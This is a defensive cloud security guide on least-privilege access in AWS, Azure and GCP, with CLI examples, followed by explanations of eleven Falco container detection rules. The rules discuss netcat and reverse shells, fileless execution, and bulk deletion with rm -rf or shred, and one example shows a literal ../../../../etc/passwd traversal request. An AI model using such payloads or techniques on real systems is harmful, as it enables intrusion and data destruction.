How to Implement the Principle of Least Privilege (Cloud Security) in AWS, Azure, and GCP

The Principle of Least Privilege (PoLP) is a foundational concept in cybersecurity aimed at minimizing the risk of security breaches. By granting users and applications only the minimum levels of access, or permissions, needed to perform their tasks, organizations can significantly reduce their attack surface. In the context of cloud computing, implementing PoLP is critical. This article explores how to enforce PoLP in the three major cloud platforms: Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP).

AWS (Amazon Web Services)

1. Identity and Access Management (IAM)

AWS IAM is the core service for managing permissions. To implement PoLP:

  • Create Fine-Grained Policies: Define granular IAM policies that specify exact actions allowed on specific resources. Use JSON policy documents to customize permissions precisely (a minimal sketch follows this list).
  • Use IAM Roles: Instead of assigning permissions directly to users, create roles with specific permissions and assign these roles to users or services. This reduces the risk of over-permissioning.
  • Adopt IAM Groups: Group users with similar access requirements together. Assign permissions to groups instead of individual users to simplify management.
  • Enable Multi-Factor Authentication (MFA): Require MFA for all users, especially those with elevated privileges, to add an extra layer of security.
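
For instance, a least-privilege policy for a reporting workload might allow read-only access to a single S3 prefix. The AWS CLI sketch below is illustrative only; the bucket name, role name, and account ID are hypothetical placeholders.

```bash
# Hypothetical read-only policy scoped to one bucket and prefix.
cat > readonly-reports-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-reports-bucket",
        "arn:aws:s3:::example-reports-bucket/reports/*"
      ]
    }
  ]
}
EOF

# Create the managed policy and attach it to a role rather than to users.
aws iam create-policy --policy-name ReadOnlyReports \
  --policy-document file://readonly-reports-policy.json
aws iam attach-role-policy --role-name example-reporting-role \
  --policy-arn arn:aws:iam::123456789012:policy/ReadOnlyReports
```

Attaching the policy to a role rather than to individual users keeps the permission surface easier to audit and revoke.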

2. AWS Organizations and Service Control Policies (SCPs)

  • Centralized Management: Use AWS Organizations to manage multiple AWS accounts. Implement SCPs at the organizational unit (OU) level to enforce PoLP across accounts (an example SCP follows this list).
  • Restrict Root Account Usage: Ensure the root account is used sparingly and secure it with strong MFA.
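
As a sketch of how an SCP can act as a guardrail, the hypothetical policy below denies most actions outside an approved region while exempting global services; the region, policy ID, and OU ID are placeholders to replace with your own values.

```bash
# Hypothetical region guardrail; global services are exempted via NotAction.
cat > deny-other-regions.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "NotAction": ["iam:*", "organizations:*", "sts:*", "support:*"],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {"aws:RequestedRegion": ["eu-west-1"]}
      }
    }
  ]
}
EOF

aws organizations create-policy --name DenyOtherRegions \
  --type SERVICE_CONTROL_POLICY --description "Region guardrail" \
  --content file://deny-other-regions.json
aws organizations attach-policy --policy-id p-examplepolicyid --target-id ou-exampleouid
```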

3. AWS Resource Access Manager (RAM)

  • Share Resources Securely: Use RAM to share AWS resources securely across accounts without creating redundant copies, adhering to PoLP.

Azure (Microsoft Azure)

1. Azure Role-Based Access Control (RBAC)

Azure RBAC enables fine-grained access management:

  • Define Custom Roles: Create custom roles tailored to specific job functions, limiting permissions to only what is necessary (see the sketch after this list).
  • Use Built-in Roles: Start with built-in roles which already follow PoLP principles for common scenarios, then customize as needed.
  • Assign Roles at Appropriate Scope: Assign roles at the narrowest scope possible (management group, subscription, resource group, or resource).
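
A custom role can be defined in JSON and created with the Azure CLI. The sketch below defines a minimal "VM operator" that can only read and restart virtual machines; the subscription ID, resource group, and assignee are placeholders.

```bash
# Hypothetical custom role: read and restart VMs, nothing else.
cat > vm-operator-role.json <<'EOF'
{
  "Name": "Virtual Machine Operator (example)",
  "Description": "Can read and restart virtual machines only.",
  "Actions": [
    "Microsoft.Compute/virtualMachines/read",
    "Microsoft.Compute/virtualMachines/restart/action"
  ],
  "NotActions": [],
  "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000000"]
}
EOF

az role definition create --role-definition @vm-operator-role.json

# Assign at the narrowest scope that works -- here, a single resource group.
az role assignment create --assignee user@example.com \
  --role "Virtual Machine Operator (example)" \
  --resource-group example-rg
```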

2. Azure Active Directory (Azure AD)

  • Conditional Access Policies: Implement conditional access policies to enforce MFA and restrict access based on conditions like user location or device compliance.
  • Privileged Identity Management (PIM): Use PIM to manage, control, and monitor access to important resources within Azure AD, providing just-in-time privileged access.

3. Azure Policy

  • Policy Definitions: Create and assign policies to enforce organizational standards and PoLP. For example, a policy to restrict VM sizes to specific configurations (an assignment sketch follows this list).
  • Initiative Definitions: Group multiple policies into initiatives to ensure comprehensive compliance across resources.
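
As a sketch of the VM-size example above, the commands below look up the built-in "Allowed virtual machine size SKUs" definition and assign it at resource-group scope. The resource group and SKU list are placeholders, and the display name and listOfAllowedSKUs parameter should be verified against your tenant's built-in definitions.

```bash
# Find the built-in definition by display name (assumed to exist in the tenant).
definition=$(az policy definition list \
  --query "[?displayName=='Allowed virtual machine size SKUs'].name | [0]" -o tsv)

# Assign it to one resource group with an allow-list of VM sizes.
az policy assignment create --name restrict-vm-sizes \
  --policy "$definition" \
  --resource-group example-rg \
  --params '{"listOfAllowedSKUs": {"value": ["Standard_B2s", "Standard_D2s_v5"]}}'
```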

GCP (Google Cloud Platform)

1. Identity and Access Management (IAM)

GCP IAM allows for detailed access control:

  • Custom Roles: Define custom roles to grant only the necessary permissions (a gcloud sketch follows this list).
  • Predefined Roles: Use predefined roles which provide granular access and adhere to PoLP.
  • Least Privilege Principle in Service Accounts: Create and use service accounts with specific roles instead of using default or highly privileged accounts.
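
A minimal gcloud sketch of both points: create a narrowly scoped custom role and grant it to a dedicated service account. The project ID, role ID, permissions, and service account name are hypothetical.

```bash
# Custom role granting only the permissions a log-reading job needs.
gcloud iam roles create logReader --project=example-project \
  --title="Log Reader (example)" \
  --permissions=logging.logEntries.list,logging.logs.list \
  --stage=GA

# Bind it to a dedicated service account instead of a broad predefined role.
gcloud projects add-iam-policy-binding example-project \
  --member="serviceAccount:log-reader@example-project.iam.gserviceaccount.com" \
  --role="projects/example-project/roles/logReader"
```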

2. Resource Hierarchy

  • Organization Policies: Use organization policies to enforce constraints on resources across the organization, such as restricting who can create certain resources.
  • Folder and Project Levels: Apply IAM policies at the folder or project level to ensure permissions are inherited appropriately and follow PoLP.

3. Cloud Identity

  • Conditional Access: Implement conditional access using Cloud Identity to enforce MFA and restrict access based on user and device attributes.
  • Context-Aware Access: Use context-aware access to allow access to apps and resources based on a user’s identity and the context of their request.

Implementing Principle of Least Privilege in AWS, Azure, and GCP

For a cloud security analyst, enforcing the Principle of Least Privilege (PoLP) is critical to minimizing security risks. This guide provides detailed, step-by-step instructions for implementing PoLP in AWS, Azure, and GCP.

AWS

Step 1: Review IAM Policies and Roles

  1. Access the IAM Console:
    • Navigate to the AWS IAM Console.
    • Review existing policies under the “Policies” section.
    • Look for policies with wildcards (*), which grant broad permissions, and replace them with more specific permissions (a script sketch follows these steps).
  2. Audit IAM Roles:
    • In the IAM Console, go to “Roles.”
    • Check each role’s attached policies. Ensure that each role has the minimum required permissions.
    • Remove or update roles that are overly permissive.
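
A rough first pass at wildcard hunting can be scripted with the AWS CLI, as sketched below. It only catches a literal "Action": "*" in customer-managed policies, so treat it as a starting point rather than a complete audit.

```bash
# Flag customer-managed policies whose default version allows all actions.
for arn in $(aws iam list-policies --scope Local \
    --query 'Policies[].Arn' --output text); do
  version=$(aws iam get-policy --policy-arn "$arn" \
    --query 'Policy.DefaultVersionId' --output text)
  aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
    --query 'PolicyVersion.Document' --output json \
    | grep -q '"Action": "\*"' && echo "wildcard action in: $arn"
done
```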

Step 2: Use IAM Access Analyzer

  1. Set Up Access Analyzer:
    • In the IAM Console, select “Access Analyzer.”
    • Create an analyzer and let it run. It will provide findings on resources shared with external entities.
    • Review the findings and take action to refine overly broad permissions.

Step 3: Test Policies with IAM Policy Simulator

  1. Simulate Policies:
    • Go to the IAM Policy Simulator.
    • Simulate the policies attached to your users, groups, and roles to understand what permissions they actually grant.
    • Adjust policies based on the simulation results to ensure they provide only the necessary permissions (see the example below).
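
The simulator is also scriptable. The sketch below asks whether a hypothetical reporting role can delete objects it should only be able to read; the ARNs are placeholders.

```bash
# Expect "allowed" for GetObject and "implicitDeny" for DeleteObject.
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::123456789012:role/example-reporting-role \
  --action-names s3:GetObject s3:DeleteObject \
  --resource-arns arn:aws:s3:::example-reports-bucket/reports/data.csv \
  --query 'EvaluationResults[].[EvalActionName,EvalDecision]' --output table
```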

Step 4: Monitor and Audit

  1. Enable AWS CloudTrail:
    • In the AWS Management Console, go to “CloudTrail.”
    • Create a new trail to log API calls across your AWS account.
    • Enable logging and monitor the CloudTrail logs regularly to detect any unauthorized or suspicious activity.
  2. Use AWS Config:
    • Navigate to the AWS Config Console.
    • Set up AWS Config to monitor and evaluate the configurations of your AWS resources.
    • Implement AWS Config Rules to check for compliance with your least privilege policies (see the sketch below).
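
Both steps can also be done from the CLI, as sketched below. The trail and bucket names are placeholders, the bucket is assumed to already carry a CloudTrail bucket policy, and IAM_POLICY_NO_STATEMENTS_WITH_ADMIN_ACCESS is an AWS Config managed rule.

```bash
# Multi-region trail logging API calls to an existing, pre-configured bucket.
aws cloudtrail create-trail --name org-audit-trail \
  --s3-bucket-name example-cloudtrail-logs --is-multi-region-trail
aws cloudtrail start-logging --name org-audit-trail

# Managed Config rule flagging IAM policies that grant full admin access.
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "no-admin-iam-policies",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "IAM_POLICY_NO_STATEMENTS_WITH_ADMIN_ACCESS"
  }
}'
```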

Step 5: Utilize Automated Tools

  1. AWS Trusted Advisor:
    • Access Trusted Advisor from the AWS Management Console.
    • Review the “Security” section for recommendations on IAM security best practices.
  2. AWS Security Hub:
    • Enable Security Hub from the Security Hub Console.
    • Use Security Hub to get a comprehensive view of your security posture, including IAM-related findings.

Azure

Step 1: Review Azure AD Roles and Permissions

  1. Azure AD Roles:
    • Navigate to the Azure Active Directory.
    • Under “Roles and administrators,” review each role and its assignments.
    • Ensure users are assigned only to roles with necessary permissions.
  2. Role-Based Access Control (RBAC):
    • Go to the “Resource groups” or individual resources in the Azure portal.
    • Under “Access control (IAM),” review role assignments.
    • Remove or modify roles that provide excessive permissions (example commands follow).
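
Reviewing and pruning assignments can be done quickly with the Azure CLI; in the sketch below, the resource group, user, and role are placeholders.

```bash
# List assignments at resource-group scope, including inherited ones.
az role assignment list --resource-group example-rg --include-inherited \
  --query "[].{principal:principalName, role:roleDefinitionName, scope:scope}" \
  -o table

# Remove an assignment found to be excessive.
az role assignment delete --assignee user@example.com \
  --role "Contributor" --resource-group example-rg
```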

Step 2: Check Resource-Level Permissions

  1. Review Resource Policies:
    • For each resource (e.g., storage accounts, VMs), review the access policies to ensure they grant only necessary permissions.
  2. Network Security Groups (NSGs):
    • Navigate to “Network security groups” in the Azure portal.
    • Review inbound and outbound rules to ensure they allow only necessary traffic (a review script follows).
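
The NSG review can be scripted as well; the resource group name below is a placeholder.

```bash
# Dump the custom rules of every NSG in a resource group for review.
for nsg in $(az network nsg list --resource-group example-rg \
    --query '[].name' -o tsv); do
  echo "== $nsg =="
  az network nsg rule list --resource-group example-rg --nsg-name "$nsg" \
    --query "[].{name:name, dir:direction, access:access, port:destinationPortRange, src:sourceAddressPrefix}" \
    -o table
done
```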

Step 3: Monitor and Audit

  1. Azure Activity Logs:
    • Access the Activity Logs.
    • Monitor logs for changes in role assignments and access patterns.
  2. Azure Security Center:
    • Open Azure Security Center.
    • Regularly review security recommendations and alerts, especially those related to IAM.

Step 4: Utilize Automated Tools

  1. Azure Policy:
    • Create and assign policies using the Azure Policy portal.
    • Enforce policies that require the use of least privilege access.
  2. Azure Blueprints:
    • Use Azure Blueprints to define and deploy resource configurations that comply with organizational standards.
  3. Privileged Identity Management (PIM):
    • In Azure AD, go to “Privileged Identity Management” under “Manage.”
    • Enable PIM to manage, control, and monitor privileged access.

GCP

Step 1: Review IAM Policies and Roles

  1. Review IAM Policies:
    • Access the IAM & admin console.
    • Review each policy and role for overly permissive permissions.
    • Avoid using predefined roles with broad permissions; prefer custom roles with specific permissions.
  2. Create Custom Roles:
    • In the IAM console, navigate to “Roles.”
    • Create custom roles that provide the minimum necessary permissions for specific job functions (a gcloud example follows).
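
One practical pattern, sketched below, is to inspect a predefined role, clone it, and strip whatever the job function does not need; the project and role IDs are placeholders.

```bash
# See exactly what a predefined role grants before copying it.
gcloud iam roles describe roles/storage.objectViewer

# Clone it into the project, then trim permissions that are not needed.
gcloud iam roles copy --source=roles/storage.objectViewer \
  --destination=reportsViewer --dest-project=example-project
gcloud iam roles update reportsViewer --project=example-project \
  --remove-permissions=storage.objects.list
```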

Step 2: Check Resource-Based Policies

  1. Service Accounts:
    • In the IAM & admin console, go to “Service accounts.”
    • Review the permissions granted to each service account and ensure they are scoped to the least privilege.
  2. VPC Firewall Rules:
    • Navigate to the VPC network section and select “Firewall rules.”
    • Review and restrict firewall rules to allow only essential traffic.

Step 3: Monitor and Audit

  1. Cloud Audit Logs:
    • Enable and configure Cloud Audit Logs for all services.
    • Regularly review logs to monitor access and detect unusual activities.
  2. IAM Recommender:
    • In the IAM console, use the IAM Recommender to get suggestions for refining IAM policies based on actual usage patterns (a CLI equivalent follows this list).
  3. Access Transparency:
    • Enable Access Transparency to get logs of Google Cloud administrator accesses.
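
The Recommender findings from step 2 can also be pulled from the command line; the sketch below assumes the Recommender API is enabled for the placeholder project.

```bash
# Least-privilege suggestions derived from actual permission usage.
gcloud recommender recommendations list \
  --project=example-project \
  --recommender=google.iam.policy.Recommender \
  --location=global --format=json
```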

Step 4: Utilize Automated Tools

  1. Security Command Center:
    • Access the Security Command Center for a centralized view of your security posture.
    • Use it to monitor and manage security findings and recommendations.
  2. Forseti Security:
    • Deploy Forseti Security for continuous monitoring and auditing of your GCP environment.
  3. Policy Intelligence:
    • Use tools like Policy Troubleshooter to debug access issues and Policy Analyzer to compare policies.

Step 5: Conduct Regular Reviews

  1. Schedule Periodic Reviews:
    • Regularly review IAM roles, policies, and access patterns across your GCP projects.
    • Use the Resource Manager to organize resources and apply IAM policies efficiently.

By following these detailed steps, you can ensure that the Principle of Least Privilege is effectively implemented across AWS, Azure, and GCP, thus maintaining a secure and compliant cloud environment.

Implementing the Principle of Least Privilege in AWS, Azure, and GCP requires a strategic approach to access management. By leveraging the built-in tools and services provided by these cloud platforms, organizations can enhance their security posture, minimize risks, and ensure compliance with security policies. Regular reviews, continuous monitoring, and automation are key to maintaining an effective PoLP strategy in the dynamic cloud environment.

The 11 Essential Falco Cloud Security Rules for Securing Containerized Applications at No Cost

In the evolving landscape of container orchestration, Kubernetes has emerged as the de facto standard due to its flexibility, scalability, and robust community support. However, as with any complex system, securing a Kubernetes environment presents unique challenges. Containers, by their very nature, are transient and multi-faceted, making traditional security methods less effective. This is where Falco, an open-source Cloud Native Computing Foundation (CNCF) project, becomes invaluable.

Falco is designed to provide security monitoring and anomaly detection for Kubernetes, enabling teams to detect malicious activity and vulnerabilities in real-time. It operates by intercepting and analyzing system calls to identify unexpected behavior within applications running in containers. As a cloud-native tool, Falco seamlessly integrates into Kubernetes environments, offering deep insights and proactive security measures without the overhead of traditional security tools.

As teams embark on securing their Kubernetes clusters, here are several Falco rules that are recommended to fortify their deployments effectively:
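
To experiment with the rules that follow, one common way to deploy Falco is the official Helm chart, sketched below; it installs Falco as a DaemonSet and tails its alerts. The namespace and release name are just conventions.

```bash
# Install Falco on the cluster via the official Helm chart.
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco --namespace falco --create-namespace

# Stream Falco alerts from the DaemonSet pods.
kubectl logs -n falco -l app.kubernetes.io/name=falco -f
```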

1. Contact K8S API Server From Container

The Falco rule “Contact K8S API Server From Container” is designed to detect attempts to communicate with the Kubernetes (K8s) API Server from a container, particularly by users who are not profiled or expected to do so. This rule is crucial because the Kubernetes API plays a pivotal role in managing the cluster’s lifecycle, and unauthorized access could lead to significant security issues.

Rule Details:

  • Purpose: To audit and flag any unexpected or unauthorized attempts to access the Kubernetes API server from within a container. This might indicate an attempt to exploit the cluster’s control plane or manipulate its configuration.
  • Detection Strategy: The rule monitors network connections made to the API server’s typical ports and checks whether these connections are made by entities (users or processes) that are not explicitly allowed or profiled in the security policy.
  • Workload Applicability: This rule is applicable in environments where containers should not typically need to directly interact with the Kubernetes API server, or where such interactions should be limited to certain profiles.

MITRE ATT&CK Framework Mapping:

  • Tactic: Credential Access, Discovery
  • Technique: T1552.007 (Unsecured Credentials: Container API)

Example Scenario:

Suppose a container unexpectedly initiates a connection to the Kubernetes API server using kubectl or a similar client. This activity could be flagged by the rule if the container and its user are not among those expected or profiled to perform such actions. Monitoring these connections helps in early detection of potential breaches or misuse of the Kubernetes infrastructure.

This rule, by monitoring such critical interactions, helps maintain the security and integrity of Kubernetes environments, ensuring that only authorized and intended communications occur between containers and the Kubernetes API server.

2. Disallowed SSH Connection Non Standard Port

The Falco security rule “Disallowed SSH Connection Non Standard Port” is designed to detect any new outbound SSH connections from a host or container that utilize non-standard ports. This is significant because SSH typically operates on port 22, and connections on other ports might indicate an attempt to evade detection.

Rule Details:

  • Purpose: To monitor and flag SSH connections that are made from non-standard ports, which could be indicative of a security compromise such as a reverse shell or command injection vulnerability being exploited.
  • Detection Strategy: The rule checks for new outbound SSH connections that do not use the standard SSH port. It is particularly focused on detecting reverse shell scenarios where the victim machine connects back to an attacker’s machine, with command and control facilitated through the SSH protocol.
  • Configuration: The rule suggests that users may need to expand the list of monitored ports based on their specific environment’s configuration and potential threat scenarios. This may include adding more non-standard ports or ranges that are relevant to their network setup.

Example Scenario:

An application on a host might be compromised to execute a command that initiates an SSH connection to an external server on a non-standard port, such as 2222 or 8080. This could be part of a command injection attack where the attacker has gained the ability to execute arbitrary commands on the host.

This rule helps in detecting such activities, which are typically red flags for data exfiltration, remote command execution, or establishing a foothold inside the network through unconventional means. By flagging these activities, administrators can investigate and respond to potential security incidents more effectively.

3. Directory Traversal Monitored File Read

The Falco rule “Directory Traversal Monitored File Read” is aimed at detecting and alerting on directory traversal attacks specifically when they involve reading files from critical system directories that are usually accessed via absolute paths. This rule is critical in preventing attackers from exploiting vulnerabilities to access sensitive information outside the intended file directories, such as the web application’s root.

Rule Details:

  • Purpose: To monitor and alert on attempts to read files from sensitive directories like /etc through directory traversal attacks. These attacks exploit vulnerabilities allowing attackers to access files and directories that lie outside the web server’s root directory.
  • Detection Strategy: The rule focuses on detecting read operations on sensitive files that should not be accessed under normal operational circumstances. Access patterns that deviate from the norm (e.g., accessing files through paths that navigate up the directory tree using ../) are flagged.
  • Workload Applicability: This rule is particularly important for environments running web applications where directory traversal vulnerabilities could be exploited.

Example Scenario:

An attacker might exploit a vulnerability in a web application to read the /etc/passwd file by submitting a request like GET /api/files?path=../../../../etc/passwd. This action attempts to break out of the intended directory structure to access sensitive information. The rule would flag such attempts, providing an alert to system administrators.

This rule helps maintain the integrity and security of the application’s file system by ensuring that only legitimate and intended file accesses occur, preventing unauthorized information disclosure through common web vulnerabilities.

4. Netcat Remote Code Execution in Container

The Falco security rule “Netcat Remote Code Execution in Container” is designed to detect instances where the Netcat tool is used within a container environment in a way that could facilitate remote code execution. This is particularly concerning because Netcat is a versatile networking tool that can be used maliciously to establish backdoors and execute commands remotely.

Rule Details:

  • Purpose: To monitor and alert on the use of the Netcat (nc) program within containers, which could indicate an attempt to misuse it for unauthorized remote command execution.
  • Detection Strategy: The rule flags the execution of Netcat inside a container, which is typically unexpected in a controlled environment. This detection focuses on uses of Netcat that might facilitate establishing a remote shell or other command execution pathways from outside the container.
  • Workload Applicability: This rule is important in environments where containers are used to host applications and where there should be strict controls over what executable utilities are allowed.

Example Scenario:

An attacker might exploit a vulnerability within an application running inside a container to download and execute Netcat. Then, they could use it to open a port that listens for incoming connections, allowing the attacker to execute arbitrary commands remotely. This setup could be used for data exfiltration, deploying additional malware, or further network exploitation.

By detecting the use of Netcat in such scenarios, administrators can quickly respond to potential security breaches, mitigating risks associated with unauthorized remote access. This rule helps ensure that containers, which are often part of a larger microservices architecture, do not become points of entry for attackers.

5. Terminal Shell in Container

The Falco security rule “Terminal Shell in Container” is designed to detect instances where a shell is used as the entry or execution point in a container, particularly with an attached terminal. This monitoring is crucial because unexpected terminal access within a container can be a sign of malicious activity, such as an attacker gaining access to run commands or scripts.

Rule Details:

  • Purpose: To monitor for the usage of interactive shells within containers, which could indicate an intrusion or misuse. Terminal shells are typically not used in production containers unless for debugging or administrative purposes, thus their use can be a red flag.
  • Detection Strategy: The rule flags instances where a shell process is initiated with terminal interaction inside a container. It can help in identifying misuse such as an attacker using kubectl exec to run commands inside a container or through other means like SSH.
  • Workload Applicability: This rule is particularly important in environments where containers are expected to run predefined tasks without interactive sessions.

Example Scenario:

An attacker or an unauthorized user gains access to a Kubernetes cluster and uses kubectl exec to start a bash shell in a running container. This action would be flagged by the rule, especially if the shell is initiated with an attached terminal, which is indicative of interactive use.

This rule helps in ensuring that containers, which should typically run without interactive sessions, are not misused for potentially harmful activities. It is a basic auditing tool that can be adapted to include a broader list of recognized processes or conditions under which shells may be legitimately used, thus reducing false positives while maintaining security.
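
For reference, a condensed sketch of what such a rule looks like in Falco's YAML syntax is shown below. It is simplified from the upstream default rule and assumes the stock Falco rule set, which defines the spawned_process and shell_procs macros, is loaded alongside it.

```bash
# Condensed sketch; relies on macros from Falco's default rules.
cat > /etc/falco/rules.d/terminal-shell.yaml <<'EOF'
- rule: Terminal shell in container (sketch)
  desc: A shell was spawned in a container with an attached terminal
  condition: spawned_process and container and shell_procs and proc.tty != 0
  output: >
    Terminal shell in container (user=%user.name container=%container.name
    shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)
  priority: NOTICE
  tags: [container, shell]
EOF
```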

6. Packet Socket Created in Container

The Falco security rule “Packet Socket Created in Container” is designed to detect the creation of packet sockets at the device driver level (OSI Layer 2) within a container. This type of socket can be used for tasks like ARP spoofing and is also linked to known vulnerabilities that could allow privilege escalation, such as CVE-2020-14386.

Rule Details:

  • Purpose: The primary intent of this rule is to monitor and alert on the creation of packet sockets within containers, a potentially suspicious activity that could be indicative of nefarious activities like network sniffing or ARP spoofing attacks. These attacks can disrupt or intercept network traffic, and the ability to create packet sockets might be used to exploit certain vulnerabilities that lead to escalated privileges within the host system.
  • Detection Strategy: This rule tracks the instantiation of packet sockets, which interact directly with the OSI Layer 2, allowing them to send and receive packets at the network interface controller level. This is typically beyond the need of standard container operations and can suggest a breach or an attempt to exploit.
  • Workload Applicability: It is crucial for environments where containers are part of a secured and controlled network and should not require low-level network access. The creation of such sockets in a standard web application or data processing container is usually out of the ordinary and warrants further investigation.

Example Scenario:

Consider a container that has been compromised through a web application vulnerability allowing an attacker to execute arbitrary commands. The attacker might attempt to create a packet socket to perform ARP spoofing, positioning the compromised container to intercept or manipulate traffic within its connected subnet for data theft or further attacks.

This rule helps in early detection of such attack vectors, initiating alerts that enable system administrators to take swift action, such as isolating the affected container, conducting a forensic analysis to understand the breach’s extent, and reinforcing network security measures to prevent similar incidents.

By implementing this rule, organizations can enhance their monitoring capabilities against sophisticated network-level attacks that misuse containerized environments, ensuring that their infrastructure remains secure against both internal and external threats. This proactive measure is a critical component of a comprehensive security strategy, especially in complex, multi-tenant container orchestration platforms like Kubernetes.

7. Debugfs Launched in Privileged Container

The Falco security rule “Debugfs Launched in Privileged Container” is designed to detect the activation of the debugfs file system debugger within a container that has privileged access. This situation can potentially lead to security breaches, including container escape, because debugfs provides deep access to the Linux kernel’s internal structures.

Rule Details:

  • Purpose: To monitor the use of debugfs within privileged containers, which could expose sensitive kernel data or allow modifications that lead to privilege escalation exploits. The rule targets a specific and dangerous activity that should generally be restricted within production environments.
  • Detection Strategy: This rule flags any instance where debugfs is mounted or used within a container that operates with elevated privileges. Given the powerful nature of debugfs and the elevated container privileges, this combination can be particularly risky.
  • Workload Applicability: This rule is crucial in environments where containers are given privileged access and there is a need to strictly control the tools and commands that can interact with the system’s kernel.

Example Scenario:

Consider a scenario where an operator mistakenly or maliciously enables debugfs within a privileged container. This setup could be exploited by an attacker to manipulate kernel data or escalate their privileges within the host system. For example, they might use debugfs to modify runtime parameters or extract sensitive information directly from kernel memory.

Monitoring for the use of debugfs within privileged containers is a critical security control to prevent such potential exploits. By detecting unauthorized or unexpected use of this powerful tool, system administrators can take immediate action to investigate and remediate the situation, thus maintaining the integrity and security of their containerized environments.

8. Execution from /dev/shm

The Falco security rule “Execution from /dev/shm” is designed to detect executions that occur within the /dev/shm directory. This directory is typically used for shared memory and can be abused by threat actors to execute malicious files or scripts stored in memory, which can be a method to evade traditional file-based detection mechanisms.

Rule Details:

  • Purpose: To monitor and alert on any executable activities within the /dev/shm directory. This directory allows for temporary storage with read, write, and execute permissions, making it a potential target for attackers to exploit by running executable files directly from this shared memory space.
  • Detection Strategy: The rule identifies any process execution that starts from within the /dev/shm directory. This directory is often used by legitimate processes as well, so the rule may need tuning to minimize false positives in environments where such usage is expected.
  • Workload Applicability: This rule is crucial for environments where stringent monitoring of executable actions is necessary, particularly in systems with high-security requirements or where the integrity of the execution environment is critical.

Example Scenario:

An attacker gains access to a system and places a malicious executable in the /dev/shm directory. They then execute this file, which could be a script or a binary, to perform malicious activities such as establishing a backdoor, exfiltrating data, or escalating privileges. Since files in /dev/shm can be executed in memory and may not leave traces on disk, this method is commonly used for evasion.

By detecting executions from /dev/shm, administrators can quickly respond to potential security breaches that utilize this technique, thereby mitigating risks associated with memory-resident malware and other fileless attack methodologies. This monitoring is a proactive measure to enhance the security posture of containerized and non-containerized environments alike.
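
A simplified sketch of this detection in Falco YAML follows; the upstream rule covers more paths and process-lineage cases, and the macros used are assumed to come from the default rule set.

```bash
# Simplified sketch of a /dev/shm execution detection (container-scoped here).
cat > /etc/falco/rules.d/dev-shm-exec.yaml <<'EOF'
- rule: Execution from /dev/shm (sketch)
  desc: A process was executed out of the /dev/shm shared-memory directory
  condition: >
    spawned_process and container and
    (proc.exe startswith "/dev/shm/" or proc.cwd startswith "/dev/shm/")
  output: >
    Executable run from /dev/shm (proc=%proc.name exe=%proc.exe
    user=%user.name container=%container.name)
  priority: WARNING
  tags: [container, mitre_defense_evasion]
EOF
```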

9. Redirect STDOUT/STDIN to Network Connection in Container

The Falco security rule “Redirect STDOUT/STDIN to Network Connection in Container” is designed to detect instances where the standard output (STDOUT) or standard input (STDIN) of a process is redirected to a network connection within a container. This behavior is commonly associated with reverse shells or remote code execution, where an attacker redirects the output of a shell to a remote location to control a compromised container or host.

Rule Details:

  • Purpose: To monitor and alert on the redirection of STDOUT or STDIN to network connections within containers, which can indicate that a container is being used to establish a reverse shell or execute remote commands—an indicator of a breach or malicious activity.
  • Detection Strategy: This rule specifically detects the use of system calls like dup (and its variants) that are employed to redirect STDOUT or STDIN to network sockets. This activity is often a component of attacks that seek to control a process remotely.
  • Workload Applicability: This rule is particularly important in environments where containers are not expected to initiate outbound connections or manipulate their output streams, which could be indicative of suspicious or unauthorized activities.

Example Scenario:

An attacker exploits a vulnerability within a web application running inside a container and gains shell access. They then execute a command that sets up a reverse shell using Bash, which involves redirecting the shell’s output to a network socket they control. This allows the attacker to execute arbitrary commands on the infected container remotely.

By monitoring for and detecting such redirections, system administrators can quickly identify and respond to potential security incidents that involve stealthy remote access methods. This rule helps to ensure that containers, which are often dynamically managed and scaled, do not become unwitting conduits for data exfiltration or further network penetration.

10. Fileless Execution via memfd_create

The Falco security rule “Fileless Execution via memfd_create” detects when a binary is executed directly from memory using the memfd_create system call. This method is a known defense evasion technique, enabling attackers to execute malware on a machine without storing any payload on disk, thus avoiding typical file-based detection mechanisms.

Rule Details:

  • Purpose: To monitor and alert on the use of the memfd_create technique, which allows processes to create anonymous files in memory that are not linked to the filesystem. This capability can be used by attackers to run malicious code without leaving typical traces on the filesystem.
  • Detection Strategy: This rule triggers when the memfd_create system call is used to execute code, which can be an indicator of an attempt to hide malicious activity. Since memfd_create can also be used for legitimate purposes, the rule may include mechanisms to whitelist known good processes.
  • Workload Applicability: It is critical in environments where integrity and security of the execution environment are paramount, particularly in systems that handle sensitive data or are part of critical infrastructure.

Example Scenario:

An attacker exploits a vulnerability in a web application to gain execution privileges on a host. Instead of writing a malicious executable to disk, they use memfd_create to load and execute the binary directly from memory. This technique helps the attack evade detection from traditional antivirus solutions that monitor file systems for changes.

By detecting executions via memfd_create, system administrators can identify and mitigate these sophisticated attacks that would otherwise leave minimal traces. Implementing such monitoring is essential in high-security environments to catch advanced malware techniques involving fileless execution. This helps maintain the integrity and security of containerized and non-containerized environments alike.

11. Remove Bulk Data from Disk

The Falco security rule “Remove Bulk Data from Disk” is designed to detect activities where large quantities of data are being deleted from a disk, which might indicate an attempt to destroy evidence or interrupt system availability. This action is typically seen in scenarios where an attacker or malicious insider is trying to cover their tracks or during a ransomware attack where data is being wiped.

Rule Details:

  • Purpose: To monitor for commands or processes that are deleting large amounts of data, which could be part of a data destruction strategy or a malicious attempt to impair the integrity or availability of data on a system.
  • Detection Strategy: This rule identifies processes that initiate bulk data deletions, particularly those that might be used in a destructive context. The focus is on detecting commands like rm -rf, shred, or other utilities that are capable of wiping data.
  • Workload Applicability: It is particularly important in environments where data integrity and availability are critical, and where unauthorized data deletion could have severe impacts on business operations or compliance requirements.

Example Scenario:

An attacker gains access to a database server and executes a command to delete logs and other files that could be used to trace their activities. Alternatively, in a ransomware attack, this type of command might be used to delete backups or other important data to leverage the encryption of systems for a ransom demand.

